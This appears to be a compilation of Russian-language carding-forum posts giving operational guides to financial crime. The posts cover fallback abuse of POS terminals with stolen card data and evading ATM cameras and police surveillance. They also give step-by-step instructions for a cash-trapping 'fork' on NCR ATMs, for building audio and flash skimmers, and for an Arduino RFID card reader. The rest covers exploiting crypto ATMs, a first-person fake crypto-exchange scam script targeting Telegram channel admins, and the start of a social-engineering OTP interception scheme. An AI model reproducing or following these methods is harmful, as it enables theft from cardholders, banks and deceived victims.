только Ашане такие посы, х#й с ним дальше ты повествуешь что записал можно на
бонусную карту ? Аххахаха
ну ты Бандит пздц) стоит бомбажара в бог пойми что одет и рычит бонусной
картой в пос терминал хахахаха дальше когда утомлённые вздохи москвичей и
навязчивый испанский стыд становится слышен в виде вздохов заебаных москвичей
или не уравновешенной кассирши вмешивается охрана короткий диалог кассира с
охраной
- Выведите этого полоумного он на бонусную карточку м видео пытается купить
спиртного на 120 тысяч
- да уже иду
И со свойственной злорадной ухмылкой и греющей душу мыслью что кто то ещё
больше нищий чем он, плюс дурак на всю голову - охранник подходит к этому ни
чем не примечательному человеку и approved код 01
Операция одобрена)
Мобилы нет, на месте решить не может, линейный отдел пронишись атмосферой
чистого позитива, со слезами на глазах пересказывают эту историю своим
коллегам переодически соываясь в диком ржаче, даже фотографируются на память и
в сотый раз пересматривая видео понимают что ни чем не могу помочь ) но всем
весело)
Терминалы верифон. Рабочие, подключенны к действующим фирма EU. Карту с чипом
после 3 ошибки чипа отсылает на прокатать ленту + пин код. И вуаля, транзакция
подтверждена и фискальный чек. Понятно что бины только EU, но получается так
что 201 налиться ещё и как
засунуть карту 201 другой стороной другого эмитета в терминал иного эмитета 3
раза, дождался надписи «протянуть в ...» протягивал +пин и транзакция
проходит. Холдер тест был по бину той же страны, какой и пос. Но при этом
холдер путешествующий но очень редко рассчитывающийся тестовой картой в
регионе тестирования. Понятно что регион лок тут отпадает ну а так механизм
работает
Если брать юсу, то там по сей день велик % как атм для работы 201, так и 101
дампов.
Видеонаблюдение в самих атм, может стоять до 16 каммер, зависит от модели атм
и внутреннего регламента СБ банка, но не менее 4 по условиям пл.систем. Таким
образом идёт запись картирдера, пинпада, шаттера, и будьте уверены, что ваш
фейс ещё записывают с 2-3 сторон. Основные камеры начинают запись только после
того как вствляешь карту в картридер, но есть как минимум одна, как правило
это кемера над монитором(не всегда), которая работает постоянно. Исходя из
всего выше сказанного, внешность нужно менять по максимуму когда налишь через
атм и не только))) кстате вот вам плюшка, до того как вставил карту в
картридер на пинпаде нажмите 456, попадёте в меню, покажет по минимуму, что
стоит и что работает. Не забывайте так же, что у каждого атм есть наружные
камеры, которые могут снять с 10-15 метров легко. Записи с камер которые в атм
могут храниться до 90 суток, это так же от регламента СБ банка зависит.
Думаю с этим всё понятно, если не понятно кому, прошу задавать вопросы в тему
Вопрос - Ответ.
Немного о наблюдении безопасный город что это значит ?, а значит следующее,
что в данном городе есть система видеонаблюдения(а она есть практически
везде)в реальном режиме времени и имеет центр мониторинга всех процессов
подконрольных камер,и камер на прилегающих территориях ,и трассах в том числе
и в последнее время это уже глобально. (не буду описывать как этот центр
называеться в разных странах названия разные, но суть одна)
Из всего этого,соответственно принятия оперативных решений в той или иной
ситуации начиная от мелкого дтп до проявлений разных криминальных элементов
или наоборот,скорее наоборот,,,чиновники и разная нечесть, имеея букет
полномочий и ресурс гос власти и.т.д и т.п. конечно будут делать свои грязные
дела в сфере экономики и похер им на всю эту систему (знают где что и как если
будет нужно подотрут запись ),,, а вот бедолага Кардер совсем не хочет стать
артистом плохого кино, популярность она на х....й не нужна ,остаться верным
своему делу,да.
Так вот начнем, мы в теме и упор делаем на случайности и некоторые закономерности, мы знаем что есть система видеонаблюдения на дорогах,на зданиях, подьездах, на автомобилях,,,на атм и над атм. Прежде всего нужно научится думать, и только потом работать.
Вообщем работаем! Заранее провели разветку местности и.т.д все было нормально
на тот момент, но не дай бог засада оперативников уже ведеться за атм , люди в
своей теме опытные и очень сложно распознать не профессионалам за зачастую и
им сложнее, если у человека есть мозг, обращаем внимание на припаркованные
вблизи тонированных авто (на возможность припаркованных во дворе тонированных
или подозрительных микроавтобусов и не только их) Не лежит душа, чувствуешь не
то, не ставь, не наль.
Движение в городских условиях так же и людское велико трудно распознать
вообщем, и дабы не попасть уже под засаду, не в коем случае не работайте
второй раз по атм, и будем надеяться на себя,на свое чутье, интуицию, опыт,
интеллект и удачу, и не дай бог такому случиться конечно.
По факту приехали на место взяли скимм планку или все в одном корпусе не
важно, оставили автомобиль по дальше от потенциального объекта установки
оборудования (убедились что нет внешних камер) много есть и скрытых которых и
не заметишь, просто думайте головой, нужна ли тут для чего то камера или нет.
Все вроде нормально,но работа уже началась как только ты взял оборудование в
руки, или положил в авто
нужно поставить оборудовани и удачно снять его, доехать от точки А до точки Б.
Как только поставили ским, нужно не на секунду не выпускать атм из вида,
всегда смотреть, что происходит у атм, если сб спалила ским, то вы заметите
этого человека, поведение будет отличатся от простого холдера. Если оставить
там без присмотра, можно придти, а там засада, тут могу посоветовать, допустим
планку снимает один, скимер другой человек, и до конца кричать, отпало, не моё
в случае чего. Бить будут правильно, долго и больно и не только бить, имейте
ввиду.
А может где то засветился под камеру все таки ??? так вот сел в авто имей при себе комплект одежды, переоденься,смени хотябы верхнюю часть одежды кепку другого цвета ,верхнюю одежду, очки), при этом сделай все спокойно, непринужденно, не привлекай лишнее внимание прохожих опять же возвращаемься к вышесказанному ,,обращаем внимание на припаркованные автомобили и сидящих в ней людей кто как и куда смотрит будь уже бдительным и осторожным от начала до конца, и будь естественным прежде всего.
Широкое распростронение имеют место быть китайские видеорегистраторы,
внимательно осмотри припаркованные автомобили или
только что подъехавший автомобиль(ли) к месту установки оборудования или
вблизи ,,,,ведь даже осмотрел все
и вроде не заметил камер, все равно всех их не увидишь, разве только под
лобовым стеклом ,,,и тут случайно
ты попал в поле зрения видеорегистратора, а хозяин данного авто и
(((чудокитайскойматьеетехники-вместевзятых))) окажеться добропорядочным и
бдительным гражданином и сунет свое рыло не в свои дела ,что нам совсем уж не
на руку !
Вывод господа, на все эти случайности и некоторые закономерности ??? работать
нужно очень аккуратно и постараться свести эти самые риски к минимуму, можно
много еще конечно об этом написать, но всех моментов не затронуть, каждый
обнал и отстава разные в корне.
Надеюсь содержимое данного текста поможет в Реале новичкам быть ну хоть немного бдительнее, не бежать со всех ног лепить свежеиспеченный скимм на атм, подумай - продумай, когда поймешь, что пришло время, ставь !!! Это как плётка, доставай лишь в том случае, если точно уверен что будешь стрелять.
Работай,зарабатывай и не расслабляйся, не теряй ту самую изначально имеющююся
бдительность и осторожность,не стройте иллюзий
обращайте внимание на возможную слежку за вами,могут вести до самого
места,дома (дислакации) идете к своему дому за несколько сотен метров,
сделайте следующее, ураните случайно ключи пачку сигарет зажигалку что
нибудь,сделайте шаг вперед машинально повернитесь чтоб поднять, посмотрите
быстро кто идет за вами или едет, то кто на вас смотрит в тот момент, возможно
автомобиль припаркованный которого 1 мин назад не было и там находиться
человек ))в момент отвернувший свой взляд от вас,застаньте в расплох
противоборствующюю сторону, если заметили слежку не подавайте ни в коем случае
виду иначе это снижает ваш шанс уйти,если нарушка была раскрыта и на вас уже
достаточно материала вас постараються принять, найдите возможность оторваться
от хвоста не идите домой,не едьте на вокзалы выбирайтесь на попутном
транспорте если вы не решили остаться в том городе если есть безопасное место
,достаточно безопасное,объективно безопасное ,выключите телефон если он у вас
с собой? вытащите батарею не звоните ни кому, постарайтесь найти место где вас
не будут искать!? не паникуйте помните человек тонет не от того что он не
умеет плавать ))) а от того что перестает думать, дальше уже конечно по
обстаятельствам ,первые важные правила вроде расписал да не забудьте что вам
очень будут нужны деньги
имейте где нибудь заначку в $ на такой момент,не тратьте кеш с обналов -
отстав, делайте накопления на всякий случай, он может наступить очень быстро
если потеряете нить осторожности.
По нашему опыту мы всегда рекомендуем проводить наблюдение за АТМом в течение 2-5 суток непрерывно, посменно меняя друг друга.
За время наблюдения вы узнаете основные важные моменты, которые скажутся на эффективности вашей дальнейшей работы, очень важно зафиксировать:
Вилка работает так - Вставляете дроповую карту и снимаете скажем 100
рублей,атм их выдает.
Вставляете вилку и забираете эти деньги.
Атм закрывает шторку и после этого вставляете еще раз карту но
уже со вставленной вилкой в атм и заказываешь крупную сумму.
Атм начинает отщелкивать деньги в диспенсер и делает отмену операции так как
не может выдать деньги, после отмены деньги с карты не списываются которые
снимаете,
они остаются на карте но бабки которые отсчитал атм уже в диспенсер внутри
банкомата и они когда отсчитываются попадают в вилку.
После этого атм уходит в сервисный режим и просто поднимаете шторку диспенсера и вынимаете деньги вместе с вилкой.
Минус такой - почти все атм после одного такого действия виснут и если
работаете с вилкой, придется объехать несколько атм за ночь.
оттестирована на ncr 86 и 87 моделей, про остальные ничего сказать не могу.
самые распространенные это уличные нцр 5887
Делаем тестовую выдачу,купюра вышла,вставляем вилку между верхним и нижним
ремнем по центру,
впихиваем до конца,чтобы загиб на откидной ручке уперся в ремни.Шторка
начинает зыкрываться, Чтобы потом
легко поднять было шторку ловим ее пластиной 1мм сверху но это не обязательно
но если этого не делать
то придется мощной отверткой потом поддеть шторку и открыть ее.Далее делаем
выдачу крупной суммы.
Подача мани началась,держим в этот момент крепко шторку,чтобы она не
открылась.Атм видит ошибку,выдает с ней чек или уходит в ребут.
Открываем отверткой шторку,вынимаем вилку с мани. У некоторых даже в сервисный
режим не уходит
атм. (НЕ ЗАБЫТЬ ОТВЕРТКУ)
1. Вставляем очень аккуратно и вытаскиваем так же чтобы не оторвать усы так
как они приделаты отдельным
компонентом и у некоторых когда что-тозастревало просто сильно дергали вилку и
они отлитали.
2. Если всетаки будете ставить миллиметрокую пластинку то не переусердствуйте
и толще не делайте а то
атм раньше времени уйдет в оффлайн когда будет защелкивать шторку.
3. Бывает, что когда только вставляют вилку то не успевают засунуть или криво
засовывают и поэтому
ременный привод диспенсера не может крутиться и опять атм зависает.
Впринципе работать с ней не сложно только аккуратно все делайте и поучиться
придется. С первого
раза у многих не получается.
4. Карта с которой работаете живет максимум 3 дня и обнаружится все когда
инкасация увидит недосдачу.
Датчиков никаких не стоит обычно.
https://aliexpress.ru/store/347654?spm=a2g0v.search0204.3.4.e29d9abbqYtyy4
RFID считыватель на основе arduino до 2 метров расстояния.
Электронные ключи доступа и пластиковые карточки прочно вошли в нашу жизнь.
Как оказалось считать с них информацию довольно просто. Достаточно
воспользоваться небольшим собранным устройством на основе микроконтроллера,
считывателя RFID меток и поместив все это в сумку из под ноутбука спокойно
считать информацию не только с электронных ключей , но и информацию с
пластиковых карточек — те самые которые не с чипом, а с электронной полосой.
В этом устройстве используется микроконтроллер Arduino Nano, его питание 3,3
Вольта. В качестве RFID считывателя использоваться может любой его цена
зависит от дистанции на которой он может считывать. Чтоб считывал с дистанции
метра два цена его будет составлять около 400 долларов, если расстояние
сантиметров 20 то цена порядка 150 долларов.
В общем все детали можно купить в интернете с доставкой домой. Не буду
указывать где именно, но пытаюсь сказать что таскать с собой пластиковую
карточку даже в обычном бумажнике или кармане довольно таки небезопасно. Про
электронные ключи доступа можно сказать что скимнуть их еще проще, обычно они
валяются где попало на столах или возле компьютера.
На рисунке видно что считанная информация сохраняется на обычно карточке в
файле cards.txt.
По этой и еще паре причин я таскаю пластиковые карточки в металлической
визитнице.
На видео более понятно смотрим.
RFID считыватель своими руками из контроллера и мотка медной проволоки.
Так как цена RFID устройств кусается ничто не мешает сделать его самому из
мотка медной проволоки и еще нескольких деталей.
Основная задача контроллера это прочитать поток данных. Известно что частота
считывания составляет 125 кГц. А карточки доступа используются повсеместно,
кстати еще они используются в супермаркетах для предотвращений потерь. Метки
устанавливаются и на одежду и на бытовую электронику, пожалуй только не
помещаются в колбасу, сыр, чипсы и пиво
. В общем в продукты.
Два студента построили RFID считыватель из подручных средств и подробно
описали как они это сделали. Включая схемы диаграммы и прочее. Вот это ихнее
устройство с ихними студенческими карточками.
И вот их
сайт:http://csql.ru/go.php?to=https://in...6/FinalProjects/s2006/cjr37/Website/index.htm
Аудио-ским на Diebold
Приветствую, в данной теме показано как собрать аудио-скиммер за 10мин,особо
не тратясь
Данный способ знают все,но всё же давайте по подробнее
Нам потребуется:китайская ручка-шпион, головка от магнитофона,батарея от
телефона(860mah хвати),2проводка разных цветов, изолента и паяльник.
С чего начнем?
Разумеется с выбора китайской ручки-шпиона
Ручки бывают уже с встроенной памятью(2-16GB) или со слотом для флешки micro-
sd,данный стафф легко распространен и кардится в китай шопах. Лучше сделать
несколько моделей ручек с разных китай шопов.
И так, берем ручку, откручиваем низ ручки где стоит стержень, видим вход для
зарядки(он может быть 2х видов(вход для провода как на плеерах,нокии 6300 и
тд) или просто USB
Мне попалась USB.Снимаем корпус ручки,перед нами остается только плата
Вот фото данной платы:
На ней всего 2 кнопки: Вверху-вкл/выкл, в середине-сброс
А так же 2 лампочки: желтая-зарядка/ожидание, синяя-идет видеозапись
Нужно заменить аккум,а то ским проработает не долго, снимаем старый и ставим
новый аккум,он будет располагаться вверху морды
Перед тем как припаять головку,нам нужно увеличить провода которые будут
соединять голову с платой,отпаиваем старые(они на фото:красный и черный),
припаиваем проводки примерно 4см чтобы был небольшой запас и голова стояла в
прозрачке как положено.
к проводам паяем голову-осталось все только правильно установить и
залить.Камера устанавливается под углом(тут нужно будет замерять у атм
правильно ли она стоит)
Итого получится(фото взято с инета):
Данные аудио кишки подходят только к дибу оптева)сейчас много моделей данной
фирмы оснащены датчиками на скиммеры.Как проверить есть ли такой датчик?
А все очень просто,в темное время суток лепим на картоприемник гвоздь на
скотче и ждем)если в течении 30мин он не ушел в офф и никто не приехал,то на
данном АТМ не установлена данная антискиминговая система.
Еще возможны помехи создаваемые АТМом,экранируйте свои девайсы)
PS Перед установкой кишков еще раз проклейте морду с внутренней стороны(как бы
не уверяли вас селлеры в крепкости морд),а то может случиться маленькое
недоразумение
Многих (особенно начинающих) мучает вопрос: "Какие кишки мне поставить на мой
скиммер/девайс?". От ответа на этот вопрос зависит очень многое:
- Процент счита;
- Время работы;
- Качество и быстрота декода;
- Обход систем защиты;
- Ваше продвижение по "Карьерной лестнице реала".
Кишки - это внутренняя электронная часть скиммингового устройства, отвечающая
за обработку и запись информации, содержащийся на магнитной полосе пластиковой
карты.
Аудио.
Для начала рассмотрим классические аудио-кишки. Принцип любых аудио кишков
состоит в записи звука с магнитной ленты кредитной карты. По сути, аудио-кишки
являются обычным диктофоном, который записывает звуковые данные, поступающие с
аудио-головки, которая расположена на месте микрофона. Далее звуковые данные
необходимо обработать (декодировать). Качество аудиоданных зависит напрямую от
частоты дискретизации. Процесс декодирования аудио данных зависит от многих
факторов и, в некоторых ситуациях, может быть затруднителен. Время,
необходимое на декод одного аудио-трека от 5 до 30 минут.
В своем большинстве, стоимость данных кишков невелика, порядка 10-50 долларов.
Размер колеблется от 10х20 до 60х60мм. Потребление питания достаточно велико,
по сравнению с флешовыми кишками. Обычно объема памяти хватает на
продолжительную запись. Многие выбирают аудио из-за возможности декодирования
в нестандартных условиях (шумка, издаваемая АТМом; джиттер; криворукий
холдер). В своем большинстве аудио не имеют шифрования. Как правило аудиокишки
считывают только второй трек.
В качестве кишков можно использовать миниатюрные диктофоны, типа " Edic-Mini".
Далее рассмотрим радио-кишки.
Принцип работы радио кишков основан на передающем модуле, который вставляется
в морду и приемнике, который расположен поблизости АТМа (как правило
расстояние от 10 до 200 метров), т.е. состоит из "радио жука" и радиостанции с
диктофоном (в качестве диктофона не редко используется планшет или КПК). В
зависимости от типа передатчика могут возникнуть проблемы с подстройкой
частоты. Приемник часто бывает совмещен с диктофоном, который записывает
полученные аудиоданные. Большим минусом такого типа кишков являются
радиопомехи, которые значительно могут затруднить счит.
Время, необходимое на декод одного аудио-трека от 5 до 45 минут. Стоимость
данных кишков будет начинаться от 100 долларов. Размер от 5х10м до 10х30мм.
Еще один неприятный момент этого типа кишков является крайне большое
потребление питания. Не требуют жестких условий в объеме передаваемых данных,
т.к. на стороне приемнике можно ставить диктофон (или другое записывающее
устройство) с любым объемом памяти. Приобрести можно на "шпионских сайтах",
радиолюбительских сайтах, карж-сайтах, радио рынках.
Блютуз-кишки, по своему действию похожи на радио кишки.
Они так же имеют принимающий модуль, который сохраняет полученные аудиоданные.
Кишки состоят из блютуз-гарнитуры и мобильного телефона (или планшета).
Приятной особенностью данных кишков является передача данных в цифровом
формате, следовательно никакие помехи им не страшны. Неприятной особенностью
данных кишков является DSP-процессор, который может фильтровать данные в
режиме реального времени (он применяется производителями мобильных устройств
для фильтрации различных высокочастотных шумов и писков, типа ветра).
Время, необходимое на декод одного аудио-трека от 5 до 30 минут. В старых
кишках (Samsung WEP-410) DSP-процессор отсутствует. Стоимость данных кишков
составляет от 100 долларов. Размер передающего модуля от 10х20мм до 20х30мм.
Потребление питания такое же, как у радио кишков. Не требуют жестких ясловий в
объеме передаваемых данных. Считывает шумку и джиттер так же, как классические
аудио кишки. Не имеют шифрования.
Далее идут GSM-аудио.
Принцип работы основан на двух сотовых телефонных аппаратах, один из которых
передает аудиоданные, а второй, в свою очередь, записывает в своей памяти
телефонный разговор. Некоторые используют GSM-жучки китайского произвоства, по
типу N9 (GOOGLE: GSM жучок N9). Кишки так же, как и блютуз, используют DSP-
процессор.
Стоимость данных кишков составляет от 150 долларов. Время, необходимое на
декод одного аудио-трека от 5 до 45 минут. Потребление питания достаточно
велико, приближено к блютуз кишкам. Большие размеры, по сравнению с аналогами
из других категорий кишков 50х50мм приблизительно. Большое потребление
питания. Не требуют жестких ясловий в объеме передаваемых данных. Приобрести
можно на сайтах, торгующих шпионскими устройствами, китайских сайтах,
радиорынках.
Последние аудиокишки, которые я хотел бы обсудить - это "Шпионские устройства", по типу ручек с встроенной камерой, брелков и т.д. Последние выпускаемые шпионские устройства имеют достаточно-приятное качество, чтобы работать в скиммерах, типа 2в1 (в одной морде пишется звук и аудио), но само качество исполнения страдает очень сильно. Часто можно встретить зависания, ограниченное время работы (не смотря на большой объем памяти до 32ГБ), поломки. Время, необходимое на декод одного аудио-трека от 5 до 30 минут. Стоимость от 20 долларов.
Флеш.
Хоть принцип работы кишков является в получении аудио данных с магнитной
дорожки, но конечным результатом флешовых кишков уже будут, не аудио данные, а
данные в текстовом формате, декод которых или уже произведен, или потребуется
незначительное время на декод всего дампа. К тому же не требуется каких-то
специальных знаний в области F2F декода.
Принцип флешовых кишков состоит в частичном декодировании аудио, а именно в
определении таймингов "на лету". Как правило, это делается за счет аппаратных
декодеров magtek (21006501-21006541). Реже используются операционные усилители
для определения таймингов.
Время, необходимое на декод одного трека от 2 до 119 секунд. Стоимость
флешовых кишков на порядок выше, чем аудио. Стоимость начинается от 200
долларов. Размер от 5х7мм. Немаловажным фактором данных кишков является низкое
потребление питания от 0,2 ма. В "боевом режиме" могут проработать 6-9 часов с
аккумулятором 6-9 ма/ч. Объема памяти хватает на 500 и более дампов. Флешовые
категорически не переносят шумку, но джиттер читают достаточно хорошо. Как
правило, все флешовые кишки имеют встроенное шифрование, которого вполне
достаточно для сдачи девайса в аренду, но категорически недостаточно для
защиты от экспертов в области дешифровки данных, т.к. в основном там
используется XOR-шифрование, иногда совмещенное с "плюс-минус байтом" (т.е.
например у нас есть оригинальный текст 123456, после данного метода текст
будет 214365). Все флешовые кишки считывает 2 или 3 трека.
Радио флеш отличается от обычного флеша тем, что данные передаются на принимающий модуль, расположенный вблизи АТМа. Вместо памяти используется приемо-передающая микросхема (или подобный модуль), типа nrf24l01, имеющая свой цифровой протокол передачи данных, которой не страшны внешние помехи. Стоимость таких кишков будет от 300 долларов. размер от 5х7мм. Потребление питания не значительно выше. чем у обычного флеша (0,5 - 0,9 ма). Объем памяти, как правило, крайне велик из-за того, что используется внешний модуль приема данных. Все остальные параметры не отличаются от классического флеша.
Суть GSM-флеш кишков состоит в том, чтобы дампы присылать в виде СМС-
сообщений. Сам передающий GSM-модуль имеет большой размер, поэтому он
находится поблизости АТМа, а данные передаются на него посредством
радиоканала. Т.е. GSM-кишки состоят из радиофлеша и GSM-модуля (в качестве
которого не редко бывают мобильные телефоны или планшеты, обрабатывающие
полученные данные и отсылающие их СМС-сообщением). Стоимость таких кишков
начинается от 500 долларов с размером от 5х7мм и потреблением, как у
радиофлеша.
Outroduction
Продажа битка криптоматам. В начале 19го года четверо парней в Канаде украли
деньги с около 100 криптоматов, их до сих пор ищут. Естественно многие
поправили это в своих автоматах, но не все. В россии криптоматов на продажу
нет, только на покупку.
Открываем сайт coinatmradar.com открываем карту, нажимаем BTC И SELL смотрим какие есть варианты. Когда нажимаете на криптомат он пишет что за обменник и что за вид криптомата. Каждый криптомат продает по разному, те кто пофиксили эту проблему выдают чек после оплаты и ожиданием 1го подтверждения, нам такой не подходит. Кто то выдает сразу если видит что комиссия отправления нормальная (как написано в чеке который я приложу), с такими банкоматами отправляйте с высокой комиссией, 5мин до подтверждения у вас в любом случае будет(в этом случае нужно работать с напарником на связи, в худшем случае вы просто обналичите свои битки). Есть криптоматы которые дают сразу как на этом видео
Советую изучить все криптоматы на ютюбе. У меня получалось снимать с Genesis coin, lamassu, shitcoins club.
Если в какой либо стране вы делаете это разово, то вас за это не привлекут так это ошибка самой сети биткоина и криптомата(возвраты даже бывают редко в обычных ситуациях) , но если делать это системно то тут преступная схема на лицо и нужно принимать соответственные меры безопасности. В данных случаях нужно тщательно планировать такие операции и смотреть на гугл картах где находится криптомат, так как некоторые стоят в офисах
Пробую развиваться в этой теме, но все упирается в то, что я не знаю с чего начать заговор, ведь просто написав кучу текста в стиле "Я PR менеджер тот-то тот-то мы хочу сотрудничать" в лучшем случае был проигнорирован, в худшем послан далеко и надолго. Так вот суть вопроса: С чего надо начинать разговор и как аккуратнее подвести лохматого к скачиванию?
**Тема статьи: Социальная инженерия, мошенничество: разбор своих кейсов, свой опыт.
Предисловие:** В тех.части я так себе, поэтому и статьи не мог ранее писать
для конкурсов тут, сейчас увидел, что принимаются статьи на тему СИ и
мошенничества, что ж, тут я уже могу что-то написать) Надеюсь получится
интересно и информативно для вас,
читателей
Расскажу два примера использования социальной инженерии на практике. Которые
практиковал лично. На первом примере опишу как заработал 2000$ на скаме с двух
человек (администраторов каналов телеграмм) за 3 дня, с помощью только СИ +
Сайта под скам.
На втором примере опишу как с помощью СИ делал перехват OTP для входа в
приложение нужного мне банка, по этому примеру можно в принципе перехватывать
ОТР под разные популярные сервисы, банки и.т.д
Хочу заранее сказать, что второй пример с перехватом ОТР по моему мнению будет более интересен аудитории этого форума, поэтому лучше начните читать с него, в первом типичный описан скам как он есть и СИ там для используется по другому, более точечно на жертву.
- Часть первая «Подготовка к скаму»
Я думаю многие из вас знают про вид скама с использованием своей фейковой
криптобиржи. Суть такого фейка криптобиржи в чем: Вы можете рисовать баланс на
аккаунтах в этой бирже и историю транзакций на всех аккаунтах, на своих, на
аккаунтах жертв, отвечать от имени тех.поддержки и.т.д., короче говоря у вас
есть полный контроль и ситуацию можно обрисовать на что фантазии хватит. При
попытке вывести нарисованный баланс с нашей биржи будет выскакивать ошибка и
сообщение с просьбой верифицировать внешний адрес биткоин на который пытаетесь
вывести средства, а для верификации нужно отправить с этого внешного адреса
бтк определенное количество битка на ваш аккаунт в бирже, тогда адрес
верификацию пройдет и сможете сделать вывод.
Первое, что вы наверное уже подумали «знаем мы такой скам, школьный и паблик
он вообще», так вот не спешите, я сейчас опишу как на таком вот паблике можно
сделать пару тысяч долларов.
Что для этого нужно? Первым делом придумать ситуацию из-за чего у нашей
будущей жертвы появится баланс на нашей фейковой криптобирже. Тут тонкая
грань, нужна именно такая ЦА которая вроде бы и деньги имеет но за биток не
особо шарит но и не боится его использовать при этом.
Я пришел к выводу, буду скамить владельцев телеграмм каналов, владельцев ютуб
каналов, блогеров/блогерш в инстаграмм. Уже поняли как? Именно, я буду
покупать у них оптом рекламу за криптовалюту.
Также вы наверное поняли почему именно эту категорию людей ? Потому что они в
основном не работают с криптой, у них есть деньги, они не будут боятся
использовать крипту, особенно при оптовом заказе где им сулит большой профит.
Так, вот мы выяснили ЦА, далее нужно придумать способ контакта с жертвой. Если
насчет инсты и телеграмм можно не париться и писать прямо там в директ / ЛС от
имени менеджера по закупке рекламы то с ютуб сложнее.
К этому моменту уже нужно примерно понимать под что вы будете якобы закупать
оптом рекламу, я решил, что это будет браузер Vivaldi. А знаете почему? Потому
что у вивальди можно создать почту с доменом @vivaldi.net, при этом на самом
сайте vivaldi.net нет кнопки «создать почту» или «войти», топишь жертва
которой мы пишем на почту с предложением оптовой покупки рекламы для браузера
вивальди зайдет по домену нашей почты на сайт и увидит официальный блог
браузера, без намека на то, что там может кто угодно сделать такую почту.
- Часть вторая «поиск жертв, англ и ру аудитория»
У вас должен быть готовый пример поста который вы будете давать на рекламу (В
случае телеги / инсты)
С ютубом сложнее но все таки вы можете просто выискать настоящие рекламные
материалы трастовой конторы от имени которой собрались закупаться. Для ютуба
лучше всего пре-ролл найти если не получается найти то придется нарезать ролик
про то, что вы рекламируете, сесть и придумать еще текст который под ваш ролик
будет говорить ютубер у которого вы закупаетесь.
Я начал поиск жертв таким способом как и писал выше - ютуберам выписывал на
почту от почты вивальди, выбирал англ аудиторию. Первое сообщение оформил
официально, предложением рекламы нашего бренда Vivaldi, вопрос по поводу цены,
скидки за опт. Также тут желательно подготовить договор на закуп рекламы,
шаблоны можно найти в сети.
Админам телеграмм каналов я писал русским, стандартное начало общения,
спрашиваю ценник, свободные места когда начинаются, могут ли сделать скидку
при закупе рекламы на месяц (по 1 посту в день например, придумайте себе
график который дадите менеджеру и торгуйтесь по поводу скидки, это придаст ему
уверенности)
Когда все обсудили, график, цены, скидки (цена общая которую вы должны отправить человеку должна быть не меньше 2500$ в битках). Так вот, когда все обсудили и наша жертва заметно завелась в предвкушении крупного профита, самое время спрашивать не против ли оплаты в биткоинах. Почему такая оплата ? асЯ в эти моменты объяснил все тем, что слишком высокие налоговые сборы за рекламу, для оптимизации налогооблажения некоторую рекламу мы закупаем за биткоин. Также сообщаем, что поможем с выводом биткоина на карту / банк.счет, все обьясним и рекламу можно вовсе запускать только когда выведете деньги. Все комиссии на это дело мы покроем естественно.
- Часть третья «Скам, профит x2, x3 и.т.д»
Приведу сначала пример того, что вышло из моей затеи по телеграмму.
Выписывал я админам около 3-4 часов, не спешил, написал около 50
администраторам. Главная проблема заключалась в том, что многие на предложение
принять оплату в битках начинали юлить, решается это тем, что вы во первых
берете админов не самых крупных площадок (50-100к подписчиков норм, просто
берите большой опт рекламы, чтобы сумма была заманчивая) во вторых добавляете
официоза в виде присланного на почту админа договора (опять же, с домена
vivaldi.net) В телеграмме мне в первый день попалась жертва, которой я
естественно обьяснил, что нужно зарегать кошелек на телефоне, выводить на
него, потом с него через обменник на карту. После регистрации жертвы, я
нарисовал ей баланс на сумму по которой закупал рекламу, про вывод в обменнике
она уже знала. Вот она пытается сделать вывод себе на кошелек установленный на
телефоне, при выводе ошибка, жертва естественно пишет мне. Я отвечал, что не
помню такого так как мой аккаунт с которого переводил вообще корпоративный и
посоветовал написать в тех.поддержку биржи.
Жертва пишет, мы не сразу но через 1-2 часа от имени поддержки даем ответ, что вывод доступен на верифицированный внешний адрес БТК, так как ваш аккаунт не пополнялся с внешного адреса - у вас нет верифицированного внешнего адреса бтк для вывода. Чтобы верифицировать адрес внесите депозит на аккаунт биржи с того адреса на который хотите в дальнейшем делать вывод. Самое главное при общении от имени ТП писать точно также как ТП. Начинать с «Здравствуйте, спасибо, что обратились» и заканчивать «С уважением, поддежрка крипткоинваллей.ком», также в идеале, чтобы биржа была не Русская и от имени ТП вы соотвественно тоже общались не на русском. Я делал именно так.
Далее жертва может написать опять нам, посоветоваться, лучше всего тянуть
время и говорить мол «погодите, уточню у других сотрудников» и через время
писать, что мол да, все верно вам ТП сказала, нужно верифнуть внешний БТК
депозитом. Мой первый депозит был по сумме 200$. После депозита от жертвы, она
через час-два делает попытку вывода и снова видит ошибку, пишет опять нам в
ТП. Тут мы начинаем включать фантазию, я говорил первое, что вы оплатили ровно
200$, а нужно было 200$+1%, чтобы адрес внешний верифицировался. И
соответственно меняю текст ошибки при выводе, дописывая туда про 1%. Вам
сейчас может показаться это глупо но поверьте, просто поверьте люди
оплачивают
После второй оплаты человек опять пытается вывести, опять ошибка, пишет в ТП.
Я написал далее, что вы внесли неверную сумму, вот точная сумма в БТК которую
вы должны были внести сумма BTC эквивалентная 204$, человек может поворчать
один день но сделает третью оплату по итогу в 90% случаев. После этого жертва
пытается опять сделать вывод средств, опять ошибка, пишет в ТП. Тут я уже
включил тех.часть, так как у нас есть доступ к редактированию чего угодно на
сайте, я редактировал сумму БТК которую написал в прошлом обращении жертвы,
например если было написано 0.01232 BTC то я отредактировал на 0.12332 BTC и
указал жертве, что она вновь внесла не точное количество БТК для верифа
внешнего адреса. Таким вот образом мне удалось найти двух админов ТГ каналов,
оба админа скинули мне в общем по 1к$ в бтк, один вроде около 800, а второй
все 1000, скринов к сожалению не осталось, было дело года полтора назад. Время
на их поиск + получение всех оплат от них заняло примерно 5-7 дней. Потом я
забросил ибо меня рутина заебала быстро, очень трудно выискавать сначала
каналы, а потом выписывать их админам.
После успеха с ТГ я забил на ютуб как-то однако до сих пор считаю, что при
скаме таким образом забугор ютуберов можно очень неплохо навариться.
Пример второй «Перехват ОТП для популярных сервисов, банков и.т.д, с помощью СИ»
Сейчас расскажу еще из практики, как можно массово перехватывать ОТП для каких либо популярных сервисов, банков и.т.д, в общем с мест где требуется какая-то инфа (например номер карты, телефона) + ОТР.
Мне нужен был перехват для одного банка, в банке просили телефон, номер карты
и ОТР после всех этих вбитых данных, вот как я решил это:
Делаем в инсте аккаунт, аккаунт оформляем под магазин, тематику магазина
выбираете любую но лучше магазин электроники. Крутим 8-10 тыс.подписчиков
(скорость ставьте небольшую), в течении недели выкладываем посты на тематику
которую выбрали, по 3-5 постов в день будет норм. Посты лучше делать с лого
магазина, это не сложно и быстро, через сервисы по типу Canva
После того как закончили оформлять профиль делаем рекламный пост, рекламировать будем конкурс, рекламировать естественно будем закупом у админов/блогеров рекламы, выбираем таких блогеров под ваше гео, чтобы его подписчики хотя бы в 60% случаем были пользователями сервиса/банка под который Вам нужно ОТР.
